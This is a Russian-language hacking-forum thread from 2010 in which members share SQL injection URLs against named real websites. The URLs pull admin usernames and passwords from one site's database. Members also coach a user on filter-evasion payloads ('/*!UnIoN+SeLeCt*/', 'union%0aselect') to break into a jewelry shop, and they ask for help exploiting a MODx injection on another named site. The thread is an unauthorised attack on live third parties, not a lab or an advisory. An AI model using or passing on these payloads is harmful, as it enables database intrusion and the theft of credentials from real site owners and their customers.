HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.06.2010, 20:44
Op3r
Новичок
Регистрация: 10.12.2007
Сообщений: 11
Провел на форуме:
212520

Репутация: 1
По умолчанию

Gorev с этого момента поподробнее, с помощью какого запроса Вы получили данные?
 
Ответить с цитированием

  #2  
Старый 16.06.2010, 20:52
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+password,2+from+442393_oasisofthes eas_data.adminUsers

 
Ответить с цитированием

  #3  
Старый 16.06.2010, 21:06
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


По умолчанию

http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+concat_ws(0x3a,id,name,password),2 +from+adminUsers+--+
 
Ответить с цитированием

  #4  
Старый 16.06.2010, 22:57
manerus
Новичок
Регистрация: 10.08.2009
Сообщений: 16
Провел на форуме:
27247

Репутация: 1
По умолчанию

http://www.site.com/info.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

скуля есть, поля нашёл но при определение выводимых столбцов union select выдаёт

Forbidden
You don't have permission to access /info.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


з.ы. это шоп c ювелиркой, кто поможет и объеснит c меня + и линк!
 
Ответить с цитированием

  #5  
Старый 16.06.2010, 22:59
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от manerus  
http://www.site.com/info.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

скуля есть, поля нашёл но при определение выводимых столбцов union select выдаёт

Forbidden
You don't have permission to access /info.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


з.ы. это шоп c ювелиркой, кто поможет и объеснит c меня + и линк!
стоит фильтр, попробуй так /!*union*/+/!*select*/
 
Ответить с цитированием

  #6  
Старый 16.06.2010, 23:04
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от Konqi  
стоит фильтр, попробуй так /!*union*/+/!*select*/
or
union%0aselect
 
Ответить с цитированием

  #7  
Старый 16.06.2010, 23:14
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


По умолчанию

или
/*!UnIoN+SeLeCt*/
UnIoN/**/SeLeCt
 
Ответить с цитированием

  #8  
Старый 16.06.2010, 23:31
manerus
Новичок
Регистрация: 10.08.2009
Сообщений: 16
Провел на форуме:
27247

Репутация: 1
По умолчанию

Цитата:
Сообщение от wildshaman  
или
/*!UnIoN+SeLeCt*/
UnIoN/**/SeLeCt

респект
/*!UnIoN+SeLeCt*/)) лови +
 
Ответить с цитированием

  #9  
Старый 16.06.2010, 23:16
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


По умолчанию

Вот нашел на хакер.ру уязвимость:
Цитата:
SQL-инъекция в MODx
Программа: MODx 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" сценарием manager/index.php (когда "a" установлен в "16") перед использованием в SQL запросах в manager/actions/mutate_templates.dynamic.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит: http://host/manager/index.php?id=4%27+ANY_SQL&a=16
Помогите скулю раскрутить, а то что-то не получается.
Вот пример сайта на этой CMS: http://bobsguides.com/manager/index.php?id=4&a=16
 
Ответить с цитированием

  #10  
Старый 16.06.2010, 23:31
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

мэн там нету скули
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.